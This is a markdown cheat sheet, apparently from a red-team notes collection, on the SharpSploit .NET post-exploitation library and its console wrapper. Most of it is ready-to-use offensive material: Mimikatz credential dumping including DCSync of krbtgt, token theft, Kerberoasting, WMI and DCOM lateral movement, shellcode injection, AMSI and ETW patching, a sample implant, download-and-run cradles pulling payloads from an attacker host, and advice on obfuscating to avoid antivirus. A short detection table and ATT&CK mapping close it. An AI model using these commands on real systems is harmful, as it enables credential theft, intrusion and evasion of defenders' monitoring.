sharpsploit.md (28606B)
1 --- 2 title: "SharpSploit" 3 description: "SharpSploit .NET post-exploitation library: execution, credentials, enumeration and evasion APIs." 4 category: tools 5 tags: [post-exploitation, dotnet, offensive] 6 tools: [SharpSploit] 7 difficulty: advanced 8 updated: "2026-08-09" 9 source: "vault:ActiveDirectory/SharpSploit.md" 10 --- 11 12 # ๐ก๏ธ SharpSploit โ Complete Cheat Sheet 13 > **Author:** Netrunner | **Tags:** `C#` `Post-Exploitation` `.NET` `Red Team` `AD` 14 15 --- 16 17 ## ๐ Table of Contents 18 1. [What is SharpSploit?](#what-is-sharpsploit) 19 2. [Architecture โ Library vs Console](#architecture--library-vs-console) 20 3. [Compilation & Setup](#compilation--setup) 21 4. [Using SharpSploitConsole (Interactive)](#using-sharpsploitconsole-interactive) 22 5. [Credentials โ Mimikatz & Token Manipulation](#credentials--mimikatz--token-manipulation) 23 6. [Enumeration โ Host, Domain, Network](#enumeration--host-domain-network) 24 7. [Execution โ Shell, PowerShell, Assembly, Shellcode](#execution--shell-powershell-assembly-shellcode) 25 8. [Lateral Movement โ WMI, DCOM, SCM, PSRemoting](#lateral-movement--wmi-dcom-scm-psremoting) 26 9. [Evasion โ AMSI & ETW Patching](#evasion--amsi--etw-patching) 27 10. [Building Custom Tooling (Library Usage)](#building-custom-tooling-library-usage) 28 11. [Delivery & In-Memory Execution](#delivery--in-memory-execution) 29 12. [OPSEC Tips](#opsec-tips) 30 13. [Detection & Indicators](#detection--indicators) 31 14. [Common Errors & Fixes](#common-errors--fixes) 32 15. [Quick Reference Card](#quick-reference-card) 33 34 --- 35 36 ## What is SharpSploit? 37 38 SharpSploit is a **.NET post-exploitation library** written in C# by Ryan Cobb (@cobbr) at SpecterOps. It is designed as a **DLL** โ not a standalone executable โ providing a rich API for offensive operations from managed code. 39 40 **Key design points:** 41 - Written as a class library (`.dll`) meant to be referenced by other C# projects 42 - Wraps native Win32/NT APIs using P/Invoke and D/Invoke (DynamicInvoke) 43 - Bundles an embedded Mimikatz PE for credential operations 44 - Targets **.NET Framework 3.5 and 4.0** for maximum Windows compatibility 45 - Organized into namespaces mirroring post-exploitation phases 46 47 **Namespaces at a glance:** 48 49 | Namespace | Purpose | 50 |-----------|---------| 51 | `SharpSploit.Credentials` | Mimikatz, Token manipulation, credential harvesting | 52 | `SharpSploit.Enumeration` | Host, Domain (LDAP), Network, Clipboard enumeration | 53 | `SharpSploit.Execution` | Shell commands, PowerShell, Assembly loading, Shellcode, Process injection | 54 | `SharpSploit.LateralMovement` | WMI, DCOM, SCM, PowerShell Remoting | 55 | `SharpSploit.Evasion` | AMSI bypass, ETW patching | 56 57 > **GitHub:** `https://github.com/cobbr/SharpSploit` 58 > **API Docs:** `https://sharpsploit.cobbr.io/api/index.html` 59 60 --- 61 62 ## Architecture โ Library vs Console 63 64 ### SharpSploit (The Library) 65 - A `.dll` โ you reference it in your own C# project and call methods programmatically 66 - Maximum flexibility but requires C# development knowledge 67 - Ideal for custom implants, C2 integration, and bespoke tooling 68 69 ### SharpSploitConsole (The Wrapper) 70 - Created by **@anthemtotheego** and **@g0ldengunsec** 71 - A standalone `.exe` that wraps SharpSploit methods into a CLI interface 72 - Designed for operators who need quick access without writing C# 73 - Supports both **interactive mode** and **non-interactive one-liner mode** 74 - GitHub: `https://github.com/anthemtotheego/SharpSploitConsole` 75 76 **When to use which:** 77 | Scenario | Use | 78 |----------|-----| 79 | Quick cred dump from a beacon | SharpSploitConsole | 80 | Building a custom C2 implant | SharpSploit library | 81 | One-off lateral movement | SharpSploitConsole | 82 | Integrating into Covenant/Sliver | SharpSploit library | 83 | Learning/testing capabilities | SharpSploitConsole | 84 85 --- 86 87 ## Compilation & Setup 88 89 ### Compiling SharpSploit (the DLL) 90 91 ```powershell 92 # Clone the repo 93 git clone https://github.com/cobbr/SharpSploit.git 94 cd SharpSploit 95 96 # Open in Visual Studio 97 # File โ Open โ Solution โ SharpSploit.sln 98 99 # Build settings: 100 # Configuration: Release 101 # Platform: Any CPU (or match target arch: x64/x86) 102 # Target Framework: .NET Framework 3.5 or 4.0 103 104 # Build โ Build Solution (Ctrl+Shift+B) 105 # Output: bin\Release\SharpSploit.dll 106 ``` 107 108 ### Compiling SharpSploitConsole 109 110 ```powershell 111 # Clone the console wrapper 112 git clone https://github.com/anthemtotheego/SharpSploitConsole.git 113 cd SharpSploitConsole 114 115 # Open SharpSploitConsole.sln in Visual Studio 116 # Ensure SharpSploit.dll is referenced (should be included) 117 # Build โ Release โ Any CPU 118 119 # Optional: Merge into single EXE using Costura.Fody or ILMerge 120 # Costura.Fody is often pre-configured โ just build and it embeds DLLs 121 ``` 122 123 ### .NET Framework Compatibility 124 125 | Target OS | Default .NET | Recommended Build Target | 126 |-----------|-------------|--------------------------| 127 | Windows 7 / Server 2008 R2 | 3.5 | .NET 3.5 | 128 | Windows 8.1 / Server 2012 R2 | 4.5 | .NET 4.0 | 129 | Windows 10 / Server 2016+ | 4.6+ | .NET 4.0 | 130 | Windows 11 / Server 2022 | 4.8 | .NET 4.0 | 131 132 > **Tip:** Build for .NET 3.5 if you want max compat. Build for .NET 4.0 if you need newer API features. 133 134 --- 135 136 ## Using SharpSploitConsole (Interactive) 137 138 SharpSploitConsole provides a pre-built CLI wrapper around SharpSploit methods. It supports two modes: **interactive** (pseudo-shell) and **non-interactive** (single command). 139 140 ### Starting Interactive Mode 141 142 ```powershell 143 # Launch the console and enter interactive mode 144 SharpSploitConsole.exe Interact 145 146 # You'll get a prompt like: 147 # SharpSploit > _ 148 149 # Type commands directly at the prompt 150 # Commands are CASE-INSENSITIVE 151 ``` 152 153 ### Non-Interactive Mode (Single Command) 154 155 ```powershell 156 # Run a single command and exit โ ideal for C2 beacons 157 SharpSploitConsole.exe whoami 158 SharpSploitConsole.exe logonPasswords 159 SharpSploitConsole.exe Shell "net user /domain" 160 SharpSploitConsole.exe Kerberoast 161 ``` 162 163 ### Full SharpSploitConsole Command Reference 164 165 #### System & Identity 166 ```powershell 167 # Get current user context 168 SharpSploitConsole.exe whoami 169 170 # Escalate to SYSTEM (requires admin) 171 SharpSploitConsole.exe GetSystem 172 173 # Impersonate another process's token (requires admin + PID) 174 SharpSploitConsole.exe Impersonate <PID> 175 ``` 176 177 #### Command Execution 178 ```powershell 179 # Execute a shell command (cmd.exe) 180 SharpSploitConsole.exe Shell "whoami /all" 181 SharpSploitConsole.exe Shell "net group \"Domain Admins\" /domain" 182 SharpSploitConsole.exe Shell "ipconfig /all" 183 184 # Execute PowerShell (bypasses AMSI, ScriptBlock logging, Module logging) 185 SharpSploitConsole.exe PowerShell "Get-Process" 186 SharpSploitConsole.exe PowerShell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.x/script.ps1')" 187 ``` 188 189 #### Credential Dumping (Requires Admin/SYSTEM) 190 ```powershell 191 # Run ALL Mimikatz credential modules (except DCSync) 192 SharpSploitConsole.exe Mimi-All 193 194 # Run specific Mimikatz command 195 SharpSploitConsole.exe Mimi-Command "privilege::debug sekurlsa::logonPasswords" 196 SharpSploitConsole.exe Mimi-Command "lsadump::dcsync /user:DOMAIN\krbtgt" 197 SharpSploitConsole.exe Mimi-Command "sekurlsa::ekeys" 198 199 # Dump logon passwords (privilege::debug + sekurlsa::logonPasswords) 200 SharpSploitConsole.exe logonPasswords 201 202 # Dump SAM database hashes (local accounts) 203 SharpSploitConsole.exe SamDump 204 205 # Dump LSA Secrets (service account passwords, autologon, etc.) 206 SharpSploitConsole.exe LsaSecrets 207 208 # Dump LSA Cache (domain cached credentials โ DCC2 hashes) 209 SharpSploitConsole.exe LsaCache 210 211 # Dump Wdigest credentials 212 SharpSploitConsole.exe Wdigest 213 ``` 214 215 #### Kerberoasting 216 ```powershell 217 # Kerberoast all service accounts with SPNs 218 SharpSploitConsole.exe Kerberoast 219 ``` 220 221 #### Lateral Movement (Requires Admin on Target) 222 ```powershell 223 # Execute command via WMI on a remote host 224 SharpSploitConsole.exe WMI <computername> <username> <password> <command> 225 # Example: 226 SharpSploitConsole.exe WMI DC01 PAINTERS\admin P@ssw0rd "whoami" 227 228 # Execute command via DCOM on a remote host 229 SharpSploitConsole.exe DCOM <computername> <command> <directory> <params> 230 # Example: 231 SharpSploitConsole.exe DCOM DC01 "cmd.exe" "C:\Windows\System32" "/c whoami" 232 ``` 233 234 #### Network Enumeration 235 ```powershell 236 # Get members of a local group on a remote host 237 SharpSploitConsole.exe NetLocalGroupMembers <computername> <groupname> <username> <password> 238 # Example: 239 SharpSploitConsole.exe NetLocalGroupMembers DC01 Administrators PAINTERS\user P@ss 240 241 # List local groups on a remote host 242 SharpSploitConsole.exe NetLocalGroups <computername> <username> <password> 243 244 # List currently logged-on users on a remote host 245 SharpSploitConsole.exe NetLoggedOnUsers <computername> <username> <password> 246 247 # List active sessions on a remote host 248 SharpSploitConsole.exe NetSessions <computername> <username> <password> 249 ``` 250 251 ### Interactive Mode Full Workflow Example 252 253 ``` 254 C:\Tools> SharpSploitConsole.exe Interact 255 256 SharpSploit > whoami 257 PAINTERS\svc_admin 258 259 SharpSploit > GetSystem 260 [+] Successfully impersonated: NT AUTHORITY\SYSTEM 261 262 SharpSploit > logonPasswords 263 Authentication Id : 0 ; 999 (00000000:000003e7) 264 Session : UndefinedLogonType 265 User Name : DC01$ 266 Domain : PAINTERS 267 * Username : Administrator 268 * Domain : PAINTERS 269 * NTLM : aad3b435b51404eeaad3b435b51404ee 270 * SHA1 : ... 271 272 SharpSploit > SamDump 273 Administrator:500:aad3b4... 274 Guest:501:aad3b4... 275 276 SharpSploit > Shell "net group \"Domain Admins\" /domain" 277 Members: Administrator svc_admin 278 279 SharpSploit > Kerberoast 280 $krb5tgs$23$*svc_sql$PAINTERS.HTB$... 281 282 SharpSploit > WMI DC02 PAINTERS\Administrator P@ssw0rd "whoami" 283 painters\administrator 284 285 SharpSploit > exit 286 ``` 287 288 --- 289 290 ## Credentials โ Mimikatz & Token Manipulation 291 292 ### Using as a Library (C# Code) 293 294 ```csharp 295 using SharpSploit.Credentials; 296 297 // === MIMIKATZ OPERATIONS === 298 299 // Dump logon passwords (sekurlsa::logonPasswords) 300 string result = Mimikatz.LogonPasswords(); 301 Console.WriteLine(result); 302 303 // Run any arbitrary Mimikatz command 304 string dcsync = Mimikatz.Command("lsadump::dcsync /user:PAINTERS\\krbtgt"); 305 string ekeys = Mimikatz.Command("sekurlsa::ekeys"); 306 string cache = Mimikatz.Command("lsadump::cache"); 307 string sam = Mimikatz.Command("lsadump::sam"); 308 309 // Dump all credentials at once (logonpasswords + sam + cache + secrets + wdigest) 310 string all = Mimikatz.All(); 311 312 // Dump SAM hashes 313 string samDump = Mimikatz.SamDump(); 314 315 // Dump LSA Secrets 316 string secrets = Mimikatz.LsaSecrets(); 317 318 // Dump LSA Cache (DCC2) 319 string lsaCache = Mimikatz.LsaCache(); 320 321 // Dump Wdigest 322 string wdigest = Mimikatz.Wdigest(); 323 324 325 // === TOKEN MANIPULATION === 326 327 // Create a Tokens object 328 Tokens tokens = new Tokens(); 329 330 // Escalate to SYSTEM (requires admin) 331 bool gotSystem = tokens.GetSystem(); 332 333 // Impersonate a specific user by finding their process token 334 bool impersonated = tokens.ImpersonateUser("PAINTERS\\Administrator"); 335 336 // Impersonate a process by PID 337 bool impersonatedProc = tokens.ImpersonateProcess(1234); 338 339 // Create a new logon token with known credentials 340 bool madeToken = tokens.MakeToken("PAINTERS\\svc_sql", "Password123!"); 341 342 // Revert impersonation back to original context 343 bool reverted = tokens.RevertToSelf(); 344 345 // Enable a specific token privilege 346 tokens.EnableTokenPrivilege("SeDebugPrivilege"); 347 348 // List available token privileges 349 string privs = tokens.WhoAmI(); 350 ``` 351 352 --- 353 354 ## Enumeration โ Host, Domain, Network 355 356 ### Host Enumeration 357 358 ```csharp 359 using SharpSploit.Enumeration; 360 361 // Get list of running processes 362 string procs = Host.GetProcessList(); 363 364 // Get current directory 365 string cwd = Host.GetCurrentDirectory(); 366 367 // Get hostname 368 string hostname = Host.GetHostname(); 369 370 // Get username 371 string user = Host.GetUsername(); 372 373 // Get OS version info 374 string os = Host.GetOSVersion(); 375 376 // List files in a directory 377 string files = Host.GetDirectoryListing("C:\\Users"); 378 379 // Read a file 380 string content = Host.ReadFile("C:\\Users\\admin\\Desktop\\flag.txt"); 381 382 // Get registry value 383 string regVal = Host.GetRegistryKey("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); 384 385 // Monitor clipboard (returns clipboard contents) 386 string clipboard = Host.GetClipboard(); 387 ``` 388 389 ### Domain Enumeration (LDAP) 390 391 ```csharp 392 using SharpSploit.Enumeration; 393 394 // Get domain users 395 string users = Domain.GetDomainUsers(); 396 397 // Get domain groups 398 string groups = Domain.GetDomainGroups(); 399 400 // Get domain computers 401 string computers = Domain.GetDomainComputers(); 402 403 // Custom LDAP search 404 string search = Domain.LDAPSearch("(&(objectClass=user)(adminCount=1))", "DC=painters,DC=htb"); 405 406 // Get members of a specific group 407 string daMembers = Domain.GetDomainGroupMembers("Domain Admins"); 408 409 // Get domain trusts 410 string trusts = Domain.GetDomainTrusts(); 411 412 // Get domain controllers 413 string dcs = Domain.GetDomainControllers(); 414 415 // Get SPNs (useful for Kerberoasting prep) 416 string spns = Domain.GetDomainUserSPNs(); 417 ``` 418 419 ### Network Enumeration 420 421 ```csharp 422 using SharpSploit.Enumeration; 423 424 // Ping a host 425 bool alive = Network.Ping("10.10.10.1"); 426 427 // Port scan a host 428 string openPorts = Network.PortScan("10.10.10.1", new int[] { 21, 22, 80, 135, 389, 445, 3389, 5985 }); 429 430 // Get local group members on a remote host 431 string members = Network.GetNetLocalGroupMembers("DC01", "Administrators"); 432 433 // Get logged-on users on a remote host 434 string loggedOn = Network.GetNetLoggedOnUsers("DC01"); 435 436 // Get sessions on a remote host 437 string sessions = Network.GetNetSessions("DC01"); 438 ``` 439 440 --- 441 442 ## Execution โ Shell, PowerShell, Assembly, Shellcode 443 444 ### Shell Command Execution 445 446 ```csharp 447 using SharpSploit.Execution; 448 449 // Execute a cmd.exe command 450 string output = Shell.ShellExecute("whoami /all"); 451 string output2 = Shell.ShellExecute("net user /domain"); 452 string output3 = Shell.ShellExecute("ipconfig /all"); 453 454 // Execute and capture stderr as well 455 string result = Shell.ShellExecute("dir C:\\Users"); 456 ``` 457 458 ### PowerShell Execution 459 460 ```csharp 461 using SharpSploit.Execution; 462 463 // Execute a PowerShell command (bypasses AMSI, ScriptBlock logging, Module logging) 464 string psOutput = Shell.PowerShellExecute("Get-Process | Select-Object Name,Id"); 465 466 // Execute PowerShell script from string 467 string psScript = @" 468 $users = Get-ADUser -Filter * -Properties AdminCount 469 $users | Where-Object { $_.AdminCount -eq 1 } | Select Name 470 "; 471 string psResult = Shell.PowerShellExecute(psScript); 472 473 // Download and execute (cradle) 474 string cradle = Shell.PowerShellExecute( 475 "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.x/PowerView.ps1'); Get-DomainUser -AdminCount" 476 ); 477 ``` 478 479 ### .NET Assembly Loading (In-Memory Execution) 480 481 ```csharp 482 using SharpSploit.Execution; 483 484 // Load a .NET assembly from bytes and execute 485 byte[] assemblyBytes = File.ReadAllBytes("Rubeus.exe"); 486 Assembly.AssemblyExecute(assemblyBytes, new string[] { "kerberoast", "/outfile:hashes.txt" }); 487 488 // Load from a URL 489 byte[] assemblyFromWeb = new System.Net.WebClient().DownloadData("http://10.10.14.x/Seatbelt.exe"); 490 Assembly.AssemblyExecute(assemblyFromWeb, new string[] { "-group=all" }); 491 492 // Load a .NET DLL and call a specific method 493 Assembly.AssemblyExecute(dllBytes, "ClassName", "MethodName", new object[] { "arg1", "arg2" }); 494 ``` 495 496 ### Shellcode Execution 497 498 ```csharp 499 using SharpSploit.Execution; 500 501 // Execute raw shellcode in current process 502 byte[] shellcode = new byte[] { 0xfc, 0x48, 0x83, ... }; 503 ShellCode.ShellCodeExecute(shellcode); 504 505 // Process injection โ inject shellcode into a remote process 506 Injection.Inject(shellcode, targetPID); 507 ``` 508 509 ### D/Invoke (Dynamic Invocation) 510 511 ```csharp 512 using SharpSploit.Execution.DynamicInvoke; 513 514 // Dynamically invoke Win32 API without P/Invoke signatures 515 // Avoids static analysis / IAT hooks 516 object[] funcArgs = { processHandle, baseAddress, regionSize, allocationType, protection }; 517 IntPtr result = (IntPtr)Win32.DynamicAPIInvoke("kernel32.dll", "VirtualAllocEx", 518 typeof(Win32.Delegates.VirtualAllocEx), ref funcArgs); 519 520 // Invoke NT API 521 object[] ntArgs = { processHandle, ref baseAddress, IntPtr.Zero, ref regionSize, allocationType, protection }; 522 uint ntStatus = (uint)Native.LdrGetDllHandle("ntdll.dll", "NtAllocateVirtualMemory", 523 typeof(Native.Delegates.NtAllocateVirtualMemory), ref ntArgs); 524 ``` 525 526 --- 527 528 ## Lateral Movement โ WMI, DCOM, SCM, PSRemoting 529 530 ```csharp 531 using SharpSploit.LateralMovement; 532 533 // === WMI LATERAL MOVEMENT === 534 // Execute a command on a remote host via WMI (requires admin) 535 string wmiResult = WMI.WMIExecute("DC01", "whoami", "PAINTERS\\Administrator", "P@ssw0rd"); 536 537 // === DCOM LATERAL MOVEMENT === 538 // Execute via DCOM (MMC20.Application / ShellWindows / ShellBrowserWindow) 539 DCOM.DCOMExecute("DC01", "cmd.exe /c whoami > C:\\output.txt", "C:\\Windows\\System32"); 540 541 // === SCM (Service Control Manager) === 542 // Create and start a service on a remote host 543 // Requires admin on target + SMB access 544 // Note: Creates Windows Event logs for service creation 545 546 // === PowerShell Remoting === 547 // Execute via WinRM/PSRemoting 548 string psRemoteResult = PowerShellRemoting.InvokeCommand("DC01", "whoami; hostname"); 549 ``` 550 551 ### Lateral Movement via SharpSploitConsole 552 553 ```powershell 554 # WMI โ execute command on remote host 555 SharpSploitConsole.exe WMI DC01 "PAINTERS\admin" "P@ssw0rd" "whoami" 556 SharpSploitConsole.exe WMI DC01 "PAINTERS\admin" "P@ssw0rd" "net localgroup administrators" 557 558 # DCOM โ execute via DCOM object 559 SharpSploitConsole.exe DCOM DC01 "cmd.exe" "C:\Windows\System32" "/c whoami > C:\temp\out.txt" 560 ``` 561 562 --- 563 564 ## Evasion โ AMSI & ETW Patching 565 566 ```csharp 567 using SharpSploit.Evasion; 568 569 // Patch AMSI (AmsiScanBuffer) in current process 570 // Prevents PowerShell/AMSI from scanning loaded scripts 571 Amsi.PatchAmsiScanBuffer(); 572 573 // Patch ETW (EtwEventWrite) to suppress event logging 574 // Prevents .NET assembly loads from generating ETW events 575 Etw.PatchEtw(); 576 ``` 577 578 **Why this matters:** 579 - AMSI patch = PowerShell commands executed via `Shell.PowerShellExecute()` won't be scanned 580 - ETW patch = In-memory .NET assembly loads won't generate `Microsoft-Windows-DotNETRuntime` events 581 - Both should be called **early** before any other operations 582 583 --- 584 585 ## Building Custom Tooling (Library Usage) 586 587 ### Minimal C# Implant Example 588 589 ```csharp 590 using System; 591 using SharpSploit.Credentials; 592 using SharpSploit.Enumeration; 593 using SharpSploit.Execution; 594 using SharpSploit.Evasion; 595 596 namespace CustomImplant 597 { 598 class Program 599 { 600 static void Main(string[] args) 601 { 602 // Step 1: Patch defenses 603 Amsi.PatchAmsiScanBuffer(); 604 Etw.PatchEtw(); 605 606 // Step 2: Enumerate 607 Console.WriteLine("[*] Current User: " + Host.GetUsername()); 608 Console.WriteLine("[*] Hostname: " + Host.GetHostname()); 609 Console.WriteLine("[*] OS: " + Host.GetOSVersion()); 610 611 // Step 3: Check if we're admin 612 string privs = Shell.ShellExecute("whoami /priv"); 613 if (privs.Contains("SeDebugPrivilege")) 614 { 615 Console.WriteLine("[+] Running as admin โ dumping creds"); 616 617 // Escalate to SYSTEM 618 Tokens tokens = new Tokens(); 619 tokens.GetSystem(); 620 621 // Dump everything 622 Console.WriteLine(Mimikatz.LogonPasswords()); 623 Console.WriteLine(Mimikatz.SamDump()); 624 625 // Revert 626 tokens.RevertToSelf(); 627 } 628 629 // Step 4: Domain Enumeration 630 Console.WriteLine("[*] Domain Admins:"); 631 Console.WriteLine(Domain.GetDomainGroupMembers("Domain Admins")); 632 633 // Step 5: Kerberoast 634 Console.WriteLine("[*] SPNs found:"); 635 Console.WriteLine(Domain.GetDomainUserSPNs()); 636 } 637 } 638 } 639 ``` 640 641 ### Visual Studio Project Setup 642 643 ``` 644 1. File โ New โ Console App (.NET Framework) 645 2. Target Framework: .NET Framework 4.0 646 3. Solution Explorer โ References โ Add Reference โ Browse 647 4. Select SharpSploit.dll 648 5. Write your code using SharpSploit namespaces 649 6. Build โ Release 650 651 # Single-file merge (optional): 652 # Install Costura.Fody via NuGet: 653 Install-Package Costura.Fody 654 # Rebuild โ SharpSploit.dll is now embedded in your .exe 655 ``` 656 657 --- 658 659 ## Delivery & In-Memory Execution 660 661 ### Drop to Disk 662 663 ```powershell 664 # Download SharpSploitConsole to target 665 certutil -urlcache -f http://10.10.14.x/SharpSploitConsole.exe C:\Windows\Temp\ssc.exe 666 iwr -uri http://10.10.14.x/SharpSploitConsole.exe -outfile C:\Windows\Temp\ssc.exe 667 # Via Evil-WinRM 668 upload SharpSploitConsole.exe 669 ``` 670 671 ### In-Memory via Reflection (.NET Assembly Loading) 672 673 ```powershell 674 # Load SharpSploitConsole in memory โ never touches disk 675 $data = (New-Object Net.WebClient).DownloadData('http://10.10.14.x/SharpSploitConsole.exe') 676 $assem = [System.Reflection.Assembly]::Load($data) 677 [SharpSploitConsole.Program]::Main("logonPasswords".Split()) 678 679 # Or with arguments 680 [SharpSploitConsole.Program]::Main(@("Shell", "whoami /all")) 681 [SharpSploitConsole.Program]::Main(@("Mimi-Command", "sekurlsa::ekeys")) 682 ``` 683 684 ### Via Covenant / Grunt 685 686 ``` 687 # SharpSploit is the native library for Covenant C2 688 # All Grunt tasks use SharpSploit methods under the hood 689 690 # In Covenant UI: 691 # Interact โ Task โ Select task (e.g., Mimikatz, ShellCmd, Assembly) 692 # Tasks map directly to SharpSploit API calls 693 ``` 694 695 ### Via execute-assembly (Cobalt Strike) 696 697 ``` 698 # Load SharpSploitConsole via execute-assembly 699 beacon> execute-assembly /path/to/SharpSploitConsole.exe logonPasswords 700 beacon> execute-assembly /path/to/SharpSploitConsole.exe Kerberoast 701 beacon> execute-assembly /path/to/SharpSploitConsole.exe Shell "net group \"Domain Admins\" /domain" 702 ``` 703 704 --- 705 706 ## OPSEC Tips 707 708 ``` 709 โ Patch AMSI and ETW BEFORE any other SharpSploit operations 710 Amsi.PatchAmsiScanBuffer() + Etw.PatchEtw() 711 712 โ Use in-memory execution (Assembly.Load) โ avoid dropping to disk 713 The binary is heavily signatured by every major AV/EDR 714 715 โ Use D/Invoke (DynamicInvoke) instead of P/Invoke for API calls 716 Avoids static IAT analysis and API hooking 717 718 โ Obfuscate before deployment โ use ConfuserEx, InvisibilityCloak, or manual edits 719 Change namespaces, class names, method names, and strings 720 721 โ Use MakeToken() over ImpersonateUser() when you have creds 722 MakeToken creates a new logon โ ImpersonateUser requires finding an existing process 723 724 โ Always call RevertToSelf() after token impersonation 725 Leaving orphaned impersonation tokens can cause instability 726 727 โ Avoid Mimikatz.All() โ it's noisy. Use targeted calls instead 728 LogonPasswords() or SamDump() individually as needed 729 730 โ Use AES keys for Kerberos operations when available 731 RC4 downgrades trigger alerts on modern EDR 732 733 โ ๏ธ SharpSploitConsole is HEAVILY detected โ treat it as burned 734 Build custom wrappers instead or use through C2 frameworks 735 736 โ ๏ธ The embedded Mimikatz PE will trigger signature-based detection 737 Consider replacing with NanoDump or manual LSASS techniques 738 ``` 739 740 --- 741 742 ## Detection & Indicators 743 744 | Indicator | Details | 745 |-----------|---------| 746 | **Binary signatures** | SharpSploit.dll and SharpSploitConsole.exe are signatured by all major AV | 747 | **AMSI detection** | `AmsiScanBuffer` patching triggers `Amsi.AmsiOpenSession` alerts | 748 | **ETW events** | Assembly loads generate `Microsoft-Windows-DotNETRuntime/AssemblyLoad` events | 749 | **Mimikatz artifacts** | `sekurlsa::logonPasswords` opens LSASS โ triggers Sysmon Event 10 | 750 | **WMI lateral movement** | Generates Event 4648 (Logon with explicit credentials) + WMI events | 751 | **Token manipulation** | Sysmon Event 8 (CreateRemoteThread) and Event 10 (ProcessAccess) | 752 | **Kerberoasting** | Event 4769 (TGS request) with RC4 encryption type | 753 | **Service creation** | Event 7045 (New service installed) for SCM lateral movement | 754 | **Strings in memory** | `SharpSploit`, `cobbr`, `Mimikatz` visible in process memory | 755 756 ### MITRE ATT&CK Mapping 757 758 | Technique | TTP ID | 759 |-----------|--------| 760 | Credential Dumping (LSASS) | T1003.001 | 761 | Token Impersonation | T1134.001 | 762 | Kerberoasting | T1558.003 | 763 | WMI Execution | T1047 | 764 | DCOM Execution | T1021.003 | 765 | PowerShell Execution | T1059.001 | 766 | AMSI Bypass | T1562.001 | 767 | In-Memory .NET Assembly | T1620 | 768 769 --- 770 771 ## Common Errors & Fixes 772 773 | Error | Cause | Fix | 774 |-------|-------|-----| 775 | `System.BadImageFormatException` | Architecture mismatch (x86 vs x64) | Rebuild for correct platform or use AnyCPU | 776 | `FileNotFoundException: SharpSploit.dll` | DLL not found at runtime | Embed with Costura.Fody or place DLL in same directory | 777 | `System.TypeLoadException` | .NET Framework version mismatch | Build for .NET 3.5 if target has older Windows | 778 | `Access Denied` on Mimikatz calls | Not running as admin/SYSTEM | Call `GetSystem()` first or ensure SeDebugPrivilege | 779 | `AMSI blocked execution` | AMSI scanning caught the payload | Call `Amsi.PatchAmsiScanBuffer()` before execution | 780 | `Could not load assembly` | Assembly.Load failed | Check assembly is valid .NET, not native PE | 781 | WMI lateral movement fails | Firewall / RPC blocked | Ensure ports 135 + dynamic RPC range are open | 782 | DCOM execution fails | DCOM not enabled on target | Check `dcomcnfg` โ DCOM must be enabled | 783 | Token impersonation fails | No suitable process found for user | User must have an active session on the box | 784 | `Unhandled Exception: System.Security.SecurityException` | CLR restrictions / CAS | Run from Full Trust context, avoid constrained language | 785 786 --- 787 788 ## Quick Reference Card 789 790 ``` 791 โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 792 SHARPSPLOITCONSOLE QUICK REFERENCE 793 โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 794 795 INTERACTIVE: SharpSploitConsole.exe Interact 796 WHOAMI: SharpSploitConsole.exe whoami 797 GET SYSTEM: SharpSploitConsole.exe GetSystem 798 IMPERSONATE: SharpSploitConsole.exe Impersonate <PID> 799 800 SHELL CMD: SharpSploitConsole.exe Shell "<command>" 801 POWERSHELL: SharpSploitConsole.exe PowerShell "<command>" 802 803 LOGON PASSWORDS: SharpSploitConsole.exe logonPasswords 804 SAM DUMP: SharpSploitConsole.exe SamDump 805 LSA SECRETS: SharpSploitConsole.exe LsaSecrets 806 LSA CACHE: SharpSploitConsole.exe LsaCache 807 WDIGEST: SharpSploitConsole.exe Wdigest 808 MIMI ALL: SharpSploitConsole.exe Mimi-All 809 MIMI CUSTOM: SharpSploitConsole.exe Mimi-Command "<command>" 810 811 KERBEROAST: SharpSploitConsole.exe Kerberoast 812 813 WMI EXEC: SharpSploitConsole.exe WMI <host> <user> <pass> <cmd> 814 DCOM EXEC: SharpSploitConsole.exe DCOM <host> <cmd> <dir> <params> 815 816 NET LOCAL GROUPS: SharpSploitConsole.exe NetLocalGroups <host> <user> <pass> 817 NET GROUP MEMBERS: SharpSploitConsole.exe NetLocalGroupMembers <host> <group> <user> <pass> 818 NET LOGGED ON: SharpSploitConsole.exe NetLoggedOnUsers <host> <user> <pass> 819 NET SESSIONS: SharpSploitConsole.exe NetSessions <host> <user> <pass> 820 821 โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 822 SHARPSPLOIT LIBRARY QUICK REFERENCE (C# CODE) 823 โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 824 825 PATCH AMSI: Amsi.PatchAmsiScanBuffer(); 826 PATCH ETW: Etw.PatchEtw(); 827 828 LOGON PASSWORDS: Mimikatz.LogonPasswords(); 829 SAM DUMP: Mimikatz.SamDump(); 830 LSA SECRETS: Mimikatz.LsaSecrets(); 831 MIMI COMMAND: Mimikatz.Command("<command>"); 832 833 GET SYSTEM: tokens.GetSystem(); 834 IMPERSONATE USER: tokens.ImpersonateUser("DOMAIN\\User"); 835 MAKE TOKEN: tokens.MakeToken("DOMAIN\\User", "password"); 836 REVERT: tokens.RevertToSelf(); 837 838 SHELL CMD: Shell.ShellExecute("<command>"); 839 POWERSHELL: Shell.PowerShellExecute("<command>"); 840 LOAD ASSEMBLY: Assembly.AssemblyExecute(bytes, args); 841 SHELLCODE: ShellCode.ShellCodeExecute(bytes); 842 843 DOMAIN USERS: Domain.GetDomainUsers(); 844 DOMAIN GROUPS: Domain.GetDomainGroups(); 845 DOMAIN COMPUTERS: Domain.GetDomainComputers(); 846 LDAP SEARCH: Domain.LDAPSearch("<filter>", "<searchBase>"); 847 848 WMI EXEC: WMI.WMIExecute("host", "cmd", "user", "pass"); 849 DCOM EXEC: DCOM.DCOMExecute("host", "cmd", "dir"); 850 851 PROCESS LIST: Host.GetProcessList(); 852 READ FILE: Host.ReadFile("path"); 853 HOSTNAME: Host.GetHostname(); 854 ``` 855 856 --- 857 858 > **Sources:** SharpSploit GitHub (cobbr/SharpSploit) | SharpSploitConsole GitHub (anthemtotheego/SharpSploitConsole) | SpecterOps Blog | SharpSploit API Docs (sharpsploit.cobbr.io)